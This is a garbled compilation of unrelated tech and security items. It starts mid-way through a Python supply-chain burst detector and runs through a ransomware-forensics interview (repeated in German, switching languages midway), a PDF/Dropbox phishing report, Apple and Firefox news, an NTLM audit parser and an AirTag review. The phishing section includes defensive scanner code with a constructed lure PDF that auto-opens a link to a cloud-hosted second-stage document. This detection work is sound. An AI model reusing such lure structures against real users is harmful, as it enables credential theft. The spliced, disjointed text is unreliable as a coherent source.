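            findings[key].append("unreviewed-commit")  # no human/CI step behind this release
        by_maintainer[e["maintainer"]].append((datetime.fromisoformat(e["ts"]), key))

    # Worm behaviour: the same identity republishing many packages in a short window.
    for items in by_maintainer.values():
        items.sort()
        for i, (t0, _) in enumerate(items):
            window = [k for t, k in items[i:] if t - t0 <= BURST_WINDOW]
            if len({pkg for pkg, _ in window}) >= BURST_DISTINCT_PACKAGES:
                for k in window:
                    if "publish-burst" not in findings[k]:
                        findings[k].append("publish-burst")

    return {k: v for k, v in findings.items() if v}


def gate(events, reviewed) -> list[tuple[str, str]]:
    """Releases a pipeline should refuse to install until a human has looked at them."""
    return sorted(evaluate(events, reviewed))


if __name__ == "__main__":
    for key, reasons in sorted(evaluate(PUBLISH_EVENTS, REVIEWED_COMMITS).items()):
        print(f"{key[0]}@{key[1]}: {', '.join(reasons)}")
```

Each check on its own is weak: a token publish may be a maintainer working late, and an unreviewed commit may be a hotfix. Together with the burst rule they describe exactly the pattern of a stolen credential being used to republish everything it can reach, and the two OIDC releases with reviewed commits pass untouched, which is the point of moving publishing to workflow-bound identities.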
Monday morning, 8:00 a.m. Employees cannot log in. The production lines stand still, and digital ransom notes glare from the screens. Every CIO's nightmare has come true: a ransomware attack has paralysed operations. Normal operations are over; the state of emergency begins.
For Joanna Lang-Recht, Director IT Forensics and authorised officer (Prokuristin) at intersoft consulting services AG in Hamburg, this is everyday life. She leads a highly specialised response team that reconstructs the course of events and contains the damage while everyone else is sinking deep into chaos.
"You can actually picture it much like criminal forensics," Lang-Recht explains. Yet the reality has little to do with bright flashlights in dark rooms, even though the parallels in method are recognisable. "We don't collect gunshot residue or footprints, we focus on traces in the digital space," says the forensic investigator.
When cybercriminals strike, they leave digital fragments behind despite all their obfuscation tactics. These may be log files, altered timestamps or fragments in memory. All of these are puzzle pieces from which Lang-Recht and her team assemble the picture of the attack. Her motto: reconstruct, don't speculate. But before the detective work can begin, companies first have to snap out of their state of shock.
Between panic and paralysis
Ransomware attacks usually follow perfidious timing. The perpetrators know exactly when IT departments are most vulnerable, for instance. "Such attacks frequently take place over the weekend or on public holidays," the Hamburg-based expert reports in the TechTalk Smart Leadership podcast from COMPUTERWOCHE and CIO magazine. The encryption phase, in which the victim's data is encrypted, then runs from Friday evening through Sunday evening. By the time the workforce returns to the office on Monday, the damage is already done.
Lang-Recht describes the first reaction in affected companies as a state of absolute panic. "We are talking about a genuine state of emergency," she stresses. No email, no access to customer data, no production. In this first "stage of acceptance", as Lang-Recht calls it, the biggest mistakes are often made, ones that can massively hamper the later investigation.
The human impulse is understandable: you want to save what can be saved. But the forensic investigator warns urgently against hasty action. "We frequently see IT teams immediately trying to clean up or restore backups before they even know what happened."
Why you must not pull the plug
Lang-Recht recommends disconnecting systems from the internet but not switching them off. Shutting down a server can amount to "forensic suicide". "That destroys valuable evidence," she explains. Many attackers leave traces in RAM; once the power is cut, that information is irretrievably lost. Yet it is essential for understanding how the attackers moved through the network (lateral movement) and whether they are still active.
The correct approach, the expert says, is isolation. "Connections to service providers, customers and suppliers should be cut so as not to endanger the supply chain." Only once the infrastructure itself is secured does the actual forensic work begin, and that often calls for heavy artillery.
The scale of cyberattacks frequently exceeds the storage capacity available on site. To create forensic images, exact 1:1 copies of the storage media, enormous volumes of data must be preserved and analysed, according to Lang-Recht. Where hundreds of servers and thousands of clients have to be examined, those responsible run into physical limits.
Who is behind the attacks?
The image of the lone hacker in a hoodie, crouched in a basement between pizza boxes, is unrealistic, according to Joanna Lang-Recht. "We are dealing with highly professional threat groups," she makes clear. Cybercrime has industrialised. The ransomware-as-a-service (RaaS) business model dominates the market.
The groups are organised like mid-sized companies. They often even have HR departments that recruit developers and marketing departments that maintain the group's brand. Not infrequently they have set up multilingual customer support.
"When you go into negotiations, you are in fact sometimes dealing with first-level and second-level support," says Lang-Recht. There are price lists, discount campaigns and ticket systems.
This professionalisation makes the attacks efficient and especially dangerous, but it also offers leverage for negotiation. For the attackers it is a business, not a personal vendetta; the sole aim is profit. Yet this is exactly where a moral dilemma often arises for the affected companies: to pay or not to pay?
The ransom payment dilemma
While authorities such as the BSI recommend never paying as a matter of principle, the reality in boardrooms is different: when the company's survival is at stake, morality becomes secondary. "In the end it is a purely economic decision," she says soberly.
She strongly advises managing directors against entering the chat with the extortionists themselves. Emotions are completely out of place here; it is better to rely on specialised negotiators. The goal must be to buy time first, to drive the demand down, and to find out whether the perpetrators are even capable of restoring the data.
Particularly galling from the victim's perspective is so-called double extortion. Here the perpetrators not only encrypt the data but also threaten to publish it. If the victim refuses to pay, the criminals raise the pressure and announce the release of sensitive customer data or design documents.
Homework for the C-level
"The main points of entry are weak passwords cracked by brute force, unsecured remote access (VPN/RDP) and classic phishing," Lang-Recht sums up. Lapses in IT hygiene open the door wide for the perpetrators, above all outdated systems, inadequate patch management and a lack of network segmentation.
Once an attacker is inside the network, they should not be able to move about unhindered. In many companies, however, the networks are "flat", the forensic investigator says: whoever gets in can get everywhere. "If an attacker breaks into one part, they must not be able to encrypt the entire infrastructure," Lang-Recht demands. Network segmentation, she says, is the most effective measure for limiting the damage.
The human and organisational factor
Technology is only one side of the coin, however. The expert stresses how important it is to be prepared for an emergency. A company must know whom to turn to when it happens. Contracts guaranteeing that a team of experts will be on standby in the event of an attack are, in her view, indispensable.
Responsibilities must also be clearly defined. In a crisis there is no time for turf wars. Who decides whether internet access is cut? Who communicates with customers, suppliers and, if necessary, the press? Who informs the data protection officer? "As a rule there is always one person who takes the communicative lead," Lang-Recht observes. That role must not only be defined but also trained, through crisis-team exercises and emergency simulations.
An arms race with AI
A look into the crystal ball shows no relief. The cat-and-mouse game between attackers and defenders not only continues, it is being raised to a higher level by the use of artificial intelligence. Attackers use AI to write better phishing emails and to find vulnerabilities faster. Defenders use it to detect anomalies in network traffic in real time.
Despite the threatening situation, Lang-Recht remains an optimist. There is no such thing as one hundred percent security, but you can make it hard for the attackers. Her recommendation: invest in clean backups (offline!), network segmentation and employee training, and have a plan for day X. (mb)
Podcast episode (Spotify): https://open.spotify.com/embed/episode/76glj1FbyI6DYwhk4Z8Nw8?utm_source=oembed
- 0 comments
- 28 views
-
Montagmorgen, 8:00 Uhr. Die Mitarbeitenden können sich nicht einloggen. Die Produktionsbänder stehen still, und auf den Bildschirmen prangen digitale Erpresserschreiben. Der Albtraum eines jeden CIOs ist wahr geworden: Ein Ransomware-Angriff hat den Betrieb lahmgelegt. Jetzt endet der Regelbetrieb, und der Ausnahmezustand beginnt.
Für Joanna Lang-Recht, Director IT Forensics und Prokuristin bei der intersoft consulting services AG in Hamburg, ist dies der Alltag. Sie leitet eine hochspezialisierte Eingreiftruppe, die den Tathergang rekonstruiert und den Schaden eindämmt, während die anderen tief im Chaos versinken.
„Man kann sich das tatsächlich ähnlich vorstellen wie in der kriminalistischen Forensik“, erklärt Lang-Recht. Doch die Realität habe dann doch wenig mit grellen Taschenlampen in dunklen Räumen zu tun, auch wenn die Parallelen in der Vorgehensweise zu erkennen seien. „Wir sammeln keine Schmauchspuren oder Fußabdrücke, wie konzentrieren uns auf Spuren im digitalen Raum“, so die Forensikerin.
Wenn Cyberkriminelle zuschlagen, hinterlassen sie trotz aller Verschleierungstaktiken digitale Fragmente. Das können Logfiles sein, veränderte Zeitstempel oder Fragmente im Arbeitsspeicher. All das sind Puzzleteile, aus denen Lang-Recht und ihr Team das Bild des Angriffs zusammensetzen. Ihr Motto: Rekonstruieren statt Spekulieren. Doch bevor die detektivische Arbeit beginnen kann, müssen Unternehmen erst einmal aus der Schockstarre herausfinden.
Zwischen Panik und Paralyse
Ransomware-Angriffe folgen meist einem perfiden Timing. Beispielsweise wissen die Täter genau, wann IT-Abteilungen besonders verwundbar sind. „Häufig finden solche Angriffe über das Wochenende oder an Feiertagen statt“, berichtet die Expertin aus Hamburg in dem Podcast TechTalk Smart Leadership von COMPUTERWOCHE und CIO-Magazin. Die „Encryption-Phase“, in der die Daten des Opfers verschlüsselt werden, laufe dann von Freitag- bis Sonntagabend durch. Wenn die Belegschaft am Montag ins Büro kommt, sei das Unheil bereits geschehen.
Die erste Reaktion in den betroffenen Unternehmen beschreibt Lang-Recht als einen Zustand absoluter Panik. „Wir reden hier von einem wirklichen Ausnahmezustand“, betont sie. Keine E-Mails, kein Zugriff auf Kundendaten, keine Produktion. In diesem ersten „Stadium der Akzeptanz“, wie Lang-Recht es nennt, würden oft die größten Fehler gemacht, die eine spätere Aufklärung massiv erschweren könnten.
Der menschliche Impuls sei verständlich: Man möchte retten, was zu retten ist. Doch die Forensikerin warnt eindringlich vor Aktionismus. „Wir sehen häufig, dass IT-Teams gleich versuchen, zu bereinigen oder Backups einzuspielen, bevor sie überhaupt wissen, was passiert ist.“
Warum der Stecker nicht gezogen werden darf
Lang-Recht empfiehlt, die Systeme vom Internet zu trennen, aber nicht auszuschalten. Das Herunterfahren eines Servers könne einen „forensischen Suizid“ bedeuten. „Das vernichtet wertvolle Hinweise“, erklärt sie. Viele Angreifer hinterlassen demnach Spuren im RAM-Speicher. Wird der Strom gekappt, sind diese Informationen unwiederbringlich verloren. Die Daten sind aber essenziell, um zu verstehen, wie die Hacker sich im Netzwerk bewegt haben (Lateral Movement) und ob sie noch aktiv sind.
Die korrekte Vorgehensweise, so die Expertin, sei die Isolierung. „Die Verbindungen zu Dienstleistern, Kunden und Lieferanten sollten gekappt werden, um die Supply Chain nicht zu gefährden.“ Erst wenn die Infrastruktur in sich gesichert sei, beginne die eigentliche Arbeit der Forensik. Und diese erfordere oft das Auffahren schwerer Geschütze.
Die Dimension von Cyberangriffe sprenge nämlich nicht selten die verfügbaren Speicherkapazitäten vor Ort. Um forensische Images – exakte 1:1-Kopien der Datenträger – zu erstellen, müssen laut Lang-Recht riesige Datenmengen gesichert und analysiert werden. Sind aber hunderte Server und tausende Clients zu untersuchen, werden die Verantwortlichen an physikalische Grenzen stoßen.
Wer steckt hinter den Angriffen?
Das Bild vom einsamen Hacker im Hoodie, der zwischen Pizzaschachteln im Keller hockt, ist laut Joanna Lang-Recht unrealistisch. „Wir haben es mit hochprofessionellen Tätergruppen zu tun“, stellt sie klar. Die Cyberkriminalität hat sich industrialisiert. Das Geschäftsmodell „Ransomware-as-a-Service“ (RaaS) dominiert den Markt.
Die Gruppierungen seien wie mittelständische Betriebe aufgestellt. Sie verfügten oft sogar über Personalabteilungen, die Entwickler anwerben, und über Marketingabteilungen, die den Brand der Hackergruppe pflegten. Nicht selten hätten sie sogar einen mehrsprachigen Kundensupport installiert.
„Wenn man in die Verhandlung geht, hat man es tatsächlich teilweise mit einem First-Level- und einem Second-Level-Support zu tun“, sagt Lang-Recht. Es gebe Preislisten, Rabattaktionen und Ticket-Systeme.
Diese Professionalisierung mache die Angriffe effizient und besonders gefährlich, biete aber auch Ansatzpunkte für Verhandlungen. Für die Angreifer gehe es um ein Geschäft und nicht etwa um eine persönliche Vendetta. Das einzige Ziel ist der Profit. Doch genau hier entsteht oft ein moralisches Dilemma für die betroffenen Unternehmen: Zahlen oder nicht zahlen?
Das Dilemma der Lösegeldzahlung
Während Behörden wie das BSI empfehlen, grundsätzlich nicht zu zahlen, ist die Realität in den Vorstandsetagen eine andere: Wenn die Existenz des Unternehmens auf dem Spiel steht, wird die Moral zur Nebensache. „Es ist am Ende eine rein wirtschaftliche Entscheidung“, sagt sie nüchtern.
Geschäftsführern rät sie dringend davon ab, selbst in den Chat mit den Erpressern zu gehen. Hier seien Emotionen absolut fehl am Platz. Besser sei es, auf spezialisierte Unterhändler zu setzen. Ziel müsse sein, zunächst Zeit zu gewinnen, die Forderung zu drücken und herauszufinden, ob die Täter überhaupt in der Lage sind, die Daten wiederherzustellen.
Besonders ärgerlich aus Sicht des angegriffenen Unternehmens ist die sogenannte Double Extortion. Dabei verschlüsseln die Täter nicht nur die Daten, sondern sie drohen auch mit deren Veröffentlichung. Wenn sich also das Opfer weigert zu zahlen, erhöhen die Kriminellen den Druck und kündigen die Veröffentlichung sensibler Kundendaten oder Konstruktionspläne an.
Die Hausaufgaben für den C-Level
"The main points of entry are weak passwords that are cracked by brute force, unsecured remote-maintenance access (VPN/RDP) and classic phishing," Lang-Recht sums up. Lapses in "IT hygiene" open the door wide for attackers. These include in particular outdated systems, inadequate patch management and a lack of network segmentation.
Once an attacker is inside the network, they should not be able to move around unhindered. In many companies, however, networks are "flat," the forensic analyst says: whoever gets in can get everywhere. "If an attacker breaks into one part of the network, they must not be able to encrypt the entire infrastructure," Lang-Recht demands. Segmenting the network is the most effective measure for limiting the damage.
The human and organizational factor
But technology is only one side of the coin. The expert stresses how important it is to be prepared for an emergency. A company must know whom to turn to when an incident occurs. Contracts that guarantee that a team of experts will be on hand in the event of an attack are, in her view, indispensable.
Responsibilities must also be clearly defined. In a crisis there is no time for turf wars. Who decides whether the internet connection is cut? Who communicates with customers, suppliers and, if necessary, the press? Who informs the data protection officer? "As a rule, there is always one person who takes the lead on communication," Lang-Recht observes. This role must not only be defined but also rehearsed, through crisis-team exercises and incident simulations.
An arms race with AI
A look into the crystal ball shows no sign of relief. The cat-and-mouse game between attackers and defenders is not only continuing, it is being taken to a higher level by the use of artificial intelligence. Attackers use AI to write better phishing emails and to find vulnerabilities faster. Defenders use it to detect anomalies in network traffic in real time.
Despite the threatening situation, Lang-Recht remains an optimist. There is no such thing as one hundred percent security, but you can make things hard for attackers. Her recommendation: invest in clean backups (offline!), network segmentation and employee training, and have a plan for day X. (mb)
According to new research, attackers are still making mischief with PDFs, the old business standby, and are exploiting growing trust in services like Dropbox.
Forcepoint’s X-Labs team has uncovered a multi-stage phishing campaign that exploits PDF files and Dropbox storage through a layered redirection attack. After clicking on what looks like a legitimate PDF, victims are rerouted to a Dropbox logon impersonation page designed to harvest their credentials for internal access, account takeover, or other fraud.
“This is a perfect example of why phishing is still the number one way for criminals to get at organizations,” said David Shipley of Beauceron Security. “This attack works because it mimics normal business behavior.”
Anatomy of a multi-layered PDF attack
In this campaign, victims first receive a professional-sounding email that seems to be part of a normal procurement or tender process and asks them to review an attached document.
The type of wording is “commonly used in tender or procurement fraud, where urgency and legitimacy are deliberately created to encourage quick action,” wrote Forcepoint researcher Prashant Kumar.
The PDF serves as the primary delivery mechanism for the lure. Unbeknownst to the victim, the sender address is spoofed or belongs to a compromised account. Once they click on the attachment, they are directed to a second PDF hosted on a trusted cloud service (public.blob[.]vercel-storage[.]com), which in turn redirects them to a fake Dropbox login page. If they take the bait and enter their email address and password, those credentials are exfiltrated to attacker-controlled command-and-control (C2) infrastructure.
“The first [document] passed the email filter because it’s perfectly legitimate and links to a trusted service,” said Beauceron’s Shipley. “There’s no way to stop that without lots of negative business consequences.” The second one works because it’s not the trusted cloud service’s job to vet content hosted in it.
These types of email also often pass standard authentication checks such as Sender Policy Framework (SPF), DomainKeys Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC), which is unsurprising when the message is sent from a genuinely compromised account rather than a spoofed domain.
“The minimal and business-like content helps avoid keyword-based detection, making the message look and feel more like a routine operational request,” Kumar wrote. Thus, attackers are able to convince victims that they need to authenticate to view the documents.
This phishing campaign is interesting in that it’s multi-faceted and has been “very well thought out,” noted Erik Avakian, technical counselor at Info-Tech Research Group. And it’s effective because “nothing looks obviously wrong to the end user at any single stage. The original email is clean and gets by most filters, the first PDF opens normally and seems to be hosted on a legitimate cloud service, and the Dropbox login page looks real.
“Each step, by itself, passes the sniff test,” he said. “The danger only becomes obvious when you zoom out and look at the entire chain, and most users don’t think about chains. They think in clicks.”
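To make the chain concrete, here is an added example (my own code, not Forcepoint's or the article's) that scans a PDF for link actions and flags the pattern described above: a document whose link, or document-level auto-open action, points at a cloud storage endpoint or at a second PDF. The two sample PDFs are constructed for the example; the list of staging hosts is an assumption that extends the one host named in the report; and the regex-based scan only sees uncompressed objects, so for production use parse the file with a real PDF library and inflate object streams (/ObjStm) first.

```python
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Cloud storage / blob endpoints an attacker can use to stage a second-stage
# document. Assumption for this example: only the vercel-storage host comes
# from the Forcepoint write-up; the Dropbox entries are added because the
# final lure impersonates a Dropbox login.
STAGING_HOSTS = {
    "public.blob.vercel-storage.com",
    "dropbox.com",
    "www.dropbox.com",
    "dl.dropboxusercontent.com",
}

# /URI actions carrying a literal string; handles the common backslash escapes.
_URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")
# A document-level /OpenAction of type URI fires as soon as the file is opened.
_OPENACTION_RE = re.compile(rb"/OpenAction\s*<<[^>]*?/S\s*/URI")


def _unescape(raw: bytes) -> str:
    raw = raw.replace(b"\\(", b"(").replace(b"\\)", b")").replace(b"\\\\", b"\\")
    return raw.decode("latin-1")


def extract_uris(pdf: bytes) -> list[str]:
    """Return the distinct URI targets found in uncompressed link/action objects."""
    seen, uris = set(), []
    for m in _URI_RE.finditer(pdf):
        uri = _unescape(m.group(1))
        if uri not in seen:
            seen.add(uri)
            uris.append(uri)
    return uris


def assess_pdf(pdf: bytes) -> dict:
    """Flag the multi-stage pattern: a PDF that merely points at another document or a cloud host."""
    uris = extract_uris(pdf)
    findings = []
    for uri in uris:
        parts = urlsplit(uri)
        host = (parts.hostname or "").lower()
        if host in STAGING_HOSTS or host.endswith(".vercel-storage.com"):
            findings.append(f"link to cloud staging host {host}")
        if parts.path.lower().endswith(".pdf"):
            findings.append(f"link to a second document: {uri}")
    if _OPENACTION_RE.search(pdf):
        findings.append("URL opens automatically via /OpenAction")
    if b"/JavaScript" in pdf or b"/Launch" in pdf:
        findings.append("active content (/JavaScript or /Launch) present")
    return {"uris": uris, "findings": findings, "suspicious": bool(findings)}


# Constructed sample resembling the first-stage lure: a one-page PDF whose only
# content is a link (plus an auto-open action) to a second PDF on the blob host.
SAMPLE_LURE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (https://public.blob.vercel-storage.com/tender/RFQ-2291.pdf) >> >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 540 740] /A << /S /URI /URI (https://public.blob.vercel-storage.com/tender/RFQ-2291.pdf) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign control: an ordinary link to a web page, nothing auto-opens.
SAMPLE_BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] /Annots [4 0 R] >> endobj
4 0 obj << /Type /Annot /Subtype /Link /Rect [72 700 540 740] /A << /S /URI /URI (https://www.example.com/terms) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for name, blob in (("lure", SAMPLE_LURE_PDF), ("benign", SAMPLE_BENIGN_PDF)):
        result = assess_pdf(blob)
        print(name, "suspicious" if result["suspicious"] else "clean", result["findings"])
```

The useful signal is not any single indicator but the combination: a PDF with no content of its own, a link to another document, and a hop through a storage host that the mail filter has no reason to distrust. A mail gateway can apply the same logic to attachments before delivery; the host list should be treated as tuning data rather than a blocklist, since the same services carry legitimate traffic.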
Masquerading as a safe document format
But after so many warnings about this over time — why are people still so trusting of PDFs and Dropbox?
“Because, historically, they’ve actually been trained to be,” said Avakian. PDFs are routinely used in the business world and have been positioned as a safe, read-only document format for invoices, contracts, HR forms, and statements. This applies to Dropbox, too; it’s become a mainstream business tool that employees have been encouraged to use, and has been positioned so that its services “are not some sketchy file-sharing site anymore.”
“When people see a PDF or a Dropbox logo, their guard naturally drops,” said Avakian. Familiarity and the need for speed prevent them from pausing and taking a closer look. Attackers know this, and “exploit it perfectly.”
On top of this, Avakian pointed out, cloud infrastructure has become a “shield” for attackers. Security awareness has conditioned users to be wary of shady domains, but not of reputable platforms. It’s a mental model that’s outdated, and “attackers are way ahead of it.”
‘Don’t click links’ is not enough
Hackers know that many employees tend to touch payment processes and documents, noted Lionel Menchaca, content marketing and technical writing specialist at Forcepoint, so they must be trained to verify that invoices, purchase orders (POs), and contracts are coming from confirmed vendors, affiliates, and agencies.
“If they cannot verify, they should report suspicious emails to IT or security teams,” he said.
But the precautions don’t stop there, Shipley noted. Employees must develop good e-mail processing habits, such as by taking frequent breaks; simulations can help, as they allow people to break out of routine. Many email clicks (he estimates about 40%) occur when people are on autopilot and aren’t processing at the deep thinking level, “they’re just acting on instinct.”
Avakian agreed that email security awareness training must evolve beyond “don’t click links.” Employers and leaders at all levels must understand that modern phishing is increasingly “multi-stage, cloud-hosted, brand-impersonating, and intentionally boring-looking.” PDFs are no longer “safe by default,” and cloud services are no longer “trusted by default.”
“This type of incident becomes a great example, and [an] opportunity to build more sophisticated phishing testing,” said Avakian. “The goal is not to embarrass users, but to build security minded habits as to how attacks unfold today.”
While the basics still matter, they need to be framed honestly, he said. Hover over links, but understand that cloud-hosted URLs can still be malicious; check the sender’s “from” address and domain, but recognize that compromised or look-alike domains exist; be cautious of unexpected attachments, even PDFs, especially when they lead you somewhere else; treat any login prompts as a moment to pause, “especially when they’re triggered indirectly,” Avakian advised.
“Security awareness has to grow up, just like the threats did,” he said.
Still, clicks will happen, and effective multi-layered controls limit the damage. Multi-factor authentication (MFA), conditional access, and anomaly detection are critical, and a zero-trust mindset embeds security into a culture where the “trust by default” mindset goes away, said Avakian.
“At the end of the day, PDFs and Dropbox aren’t the problem; unquestioned trust is,” he said.
Software "signing" refers to the server-side authorization Apple performs whenever an iOS version is installed on an iPhone: the device asks Apple's signing servers to approve the firmware for that specific device, and the update cannot be installed unless that check passes.
Apple does not show users earlier versions of iOS once an upgrade has come out, but as long as a version is still being signed, it is possible to downgrade to it using the Finder on a Mac or the Apple Devices app on a Windows PC. Until today, users would have been able to downgrade from iOS 26.2.1 to iOS 26.2 if desired for some reason.
Unsigning a version prevents Apple customers from installing outdated, less secure versions of iOS; Apple typically stops signing an update a week or so after new software comes out.
Apple has also stopped signing several older versions of iOS provided for devices unable to update to iOS 26, including iOS 12.5.7, iOS 15.8.5, iOS 16.7.12, and iOS 18.7.3. iOS 12.5.8, iOS 15.8.6, and iOS 18.7.4 were released last week, while an updated version of iOS 16 came out today.
This article, "Apple Stops Signing iOS 26.2, Blocking Downgrades From iOS 26.2.1" first appeared on MacRumors.com
Safari Technology Preview 236 includes fixes and updates for CSS, Forms, HTML, Images, Media, Rendering, SVG, Web API, and WebRTC.
The current Safari Technology Preview release is compatible with machines running macOS Sequoia and macOS Tahoe, the newest version of macOS.
The Safari Technology Preview update is available through the Software Update mechanism in System Preferences or System Settings to anyone who has downloaded the browser from Apple’s website. Complete release notes for the update are available on the Safari Technology Preview website.
Apple’s aim with Safari Technology Preview is to gather feedback from developers and users on its browser development process. Safari Technology Preview can run side-by-side with the existing Safari browser and while it is designed for developers, it does not require a developer account to download and use.
This article, "Apple Releases Safari Technology Preview 236 With Bug Fixes and Performance Improvements" first appeared on MacRumors.com
Here's what can be disabled:
Translations, which help you browse the web in your preferred language.
Alt text in PDFs, which add accessibility descriptions to images in PDF pages.
AI-enhanced tab grouping, which suggests related tabs and group names.
Link previews, which show key points before you open a link.
AI chatbot in the sidebar, which lets you use your chosen chatbot as you browse, including options like Anthropic Claude, ChatGPT, Microsoft Copilot, Google Gemini and Le Chat Mistral.
The AI features can be disabled entirely or individually, so users can pick and choose what they want to use. Users will be able to continue to opt out of AI features as they are added in the browser, and the main Block AI Enhancements toggle will disable all current and future AI features, including pop-ups or reminders to use existing or upcoming AI features.
Mozilla says that it wants to be able to continue to build AI options for those who want them, while also giving those who don't a way to disable them.
AI controls will be added in Firefox 148, which is set to start rolling out to users on February 24.
This article, "Firefox Getting New Controls to Turn Off AI Features" first appeared on MacRumors.com
NTLM is a family of challenge-response authentication protocols introduced in the 1990s; since Kerberos became the default authentication protocol in Windows 2000, its use has declined with each passing year.
Still, many legacy enterprise systems support or use NTLM, leaving them exposed to NTLM relay attacks, among others. And while Microsoft administrators have been preparing for the demise of NTLM for years, many still struggle to rid their networks of the protocol.
In recent years, attackers have exploited NTLM weaknesses to gain full access to networks, so the disadvantages of supporting it outweigh the advantages. Microsoft now considers NTLM deprecated.
A timetable for the deactivation can be found on the Windows IT Pro Blog.
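The hard part of retiring NTLM is finding out who still uses it. As an added example (mine, not the article's or Microsoft's), the Python below parses a text export of NTLM audit events and builds an inventory of which clients still authenticate to which servers with NTLM. It assumes the "Network security: Restrict NTLM: Audit NTLM authentication in this domain" policy is enabled on domain controllers, which Microsoft documents as writing event ID 8004 to the Microsoft-Windows-NTLM/Operational log, and that those events were exported as text (for example with wevtutil). The records below are constructed; their field layout approximates the real event, and every host, user and domain name is invented.

```python
from __future__ import annotations

import re
from collections import Counter, defaultdict

# Constructed sample: four event 8004 records in a layout approximating
#   wevtutil qe Microsoft-Windows-NTLM/Operational /q:"*[System[EventID=8004]]" /f:text
# run on a domain controller. Names are invented for the example.
SAMPLE_EVENTS = """\
Event[0]:
  Event ID: 8004
  Description:
NTLM server blocked in the domain audit: Audit NTLM authentication in this domain
Secure Channel name: FS01
User name: jdoe
Domain name: CORP
Workstation name: WS-042
Secure Channel type: 2

Event[1]:
  Event ID: 8004
  Description:
NTLM server blocked in the domain audit: Audit NTLM authentication in this domain
Secure Channel name: FS01
User name: svc_backup
Domain name: CORP
Workstation name: BACKUP01
Secure Channel type: 2

Event[2]:
  Event ID: 8004
  Description:
NTLM server blocked in the domain audit: Audit NTLM authentication in this domain
Secure Channel name: PRINT01
User name: jdoe
Domain name: CORP
Workstation name: WS-042
Secure Channel type: 2

Event[3]:
  Event ID: 8004
  Description:
NTLM server blocked in the domain audit: Audit NTLM authentication in this domain
Secure Channel name: FS01
User name: appsvc
Domain name: CORP
Workstation name:
Secure Channel type: 2
"""

# Fields carried by the 8004 event body; "Secure Channel name" is the server
# that accepted the NTLM logon, "Workstation name" the client that sent it.
FIELDS = ("Secure Channel name", "User name", "Domain name",
          "Workstation name", "Secure Channel type")


def parse_ntlm_audit(text: str) -> list[dict]:
    """Split a text export into records and pull the audit fields out of each 8004 event."""
    events = []
    for block in re.split(r"(?m)^Event\[\d+\]:", text):
        if "Event ID: 8004" not in block:
            continue
        rec = {}
        for field in FIELDS:
            m = re.search(rf"(?m)^{re.escape(field)}:[ \t]*(.*)$", block)
            rec[field] = m.group(1).strip() if m else ""
        events.append(rec)
    return events


def ntlm_inventory(events: list[dict]) -> dict:
    """Count NTLM logons per server and per client, and list (client, user) pairs per server.

    Non-Windows clients and some appliances leave the workstation name blank;
    those are grouped under "<unknown>" so they are not silently dropped.
    """
    by_server = Counter(e["Secure Channel name"] for e in events)
    by_client = Counter(e["Workstation name"] or "<unknown>" for e in events)
    pairs: dict[str, set] = defaultdict(set)
    for e in events:
        pairs[e["Secure Channel name"]].add((e["Workstation name"] or "<unknown>", e["User name"]))
    return {
        "by_server": by_server,
        "by_client": by_client,
        "pairs": {server: sorted(p) for server, p in pairs.items()},
    }


if __name__ == "__main__":
    inv = ntlm_inventory(parse_ntlm_audit(SAMPLE_EVENTS))
    for server, count in inv["by_server"].most_common():
        print(f"{server}: {count} NTLM logons from {inv['pairs'][server]}")
```

Run against a real export, the servers at the top of the list are the ones whose dependents need to be migrated (or given a Kerberos SPN) before NTLM can be restricted rather than merely audited; blank workstation names usually point at non-Windows clients that will need attention from their owners rather than from Group Policy.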
Unfortunately, Apple didn't update the design of the AirTag 2, so it looks almost identical to the original model. The only thing that's changed is the text on the back, which is now in caps and includes wording about the IP67 waterproofing, and that doesn't count as any kind of design change.
It would have been nice to have different design options or a rechargeable battery, but the AirTag is the same coin shape and it still uses CR2032 batteries. Apple didn't mention anything about battery life improvements, so the AirTag 2 still lasts about a year before you need to swap it out.
While there aren't external updates, Apple did boost connectivity. The AirTag 2 uses an upgraded version of Bluetooth and it has a second-generation Ultra Wideband (UWB) chip, so it can be tracked from further away over Bluetooth, and the close-range Precision Finding feature works over longer distances.
According to Apple, Precision Finding works from up to 50 percent further away, so when you lose your AirTag indoors or are close to it, a UWB-enabled iPhone (the iPhone 11 and later) can lead you right to it. Apple also enabled Precision Finding on the Apple Watch Series 9 and later and the Apple Watch Ultra 2 and later, which is super useful. You can't use an Apple Watch to locate an original AirTag nearby, and it's probably the best addition to the second-generation version.
You can even add a quick access toggle for Precision Finding to the Apple Watch for instant access to tracking down an AirTag without digging through menus. It's a much more natural way to find your items.
In our testing, Precision Finding on the Apple Watch worked reliably, tracking down an AirTag indoors even with walls and furniture in the way. The interface is the same as the Precision Finding interface on iPhone, just scaled down to an Apple Watch size. You'll get a directional arrow and distance to help you accurately track down the AirTag.
When pitting the original AirTag against the AirTag 2 with iPhone Precision Finding, the AirTag 2 was clearly superior. Both AirTags were tucked inside a backpack, and placed out of line of sight.
The original AirTag had a hard time with walls and objects, and required us to be closer to the backpack to get a connection. The AirTag 2 picked up signal from much further away, and kept the signal as we walked toward the backpack. It even worked with the AirTag 2 on a different floor, and kept its connection in a large office building.
Apple also updated the internals of the AirTag 2 to upgrade the sound, and it is noticeably louder. It is a pretty big improvement in audibility, and you will notice the difference between the two. The sound is sharper and easier to pinpoint, and it is much less likely to blend into background noise. It makes it easier to find items, but it also improves the AirTag 2's anti-stalking capabilities. It's harder to tuck an AirTag away and mute its sound, and Apple also made the speaker module more difficult to remove with additional adhesive.
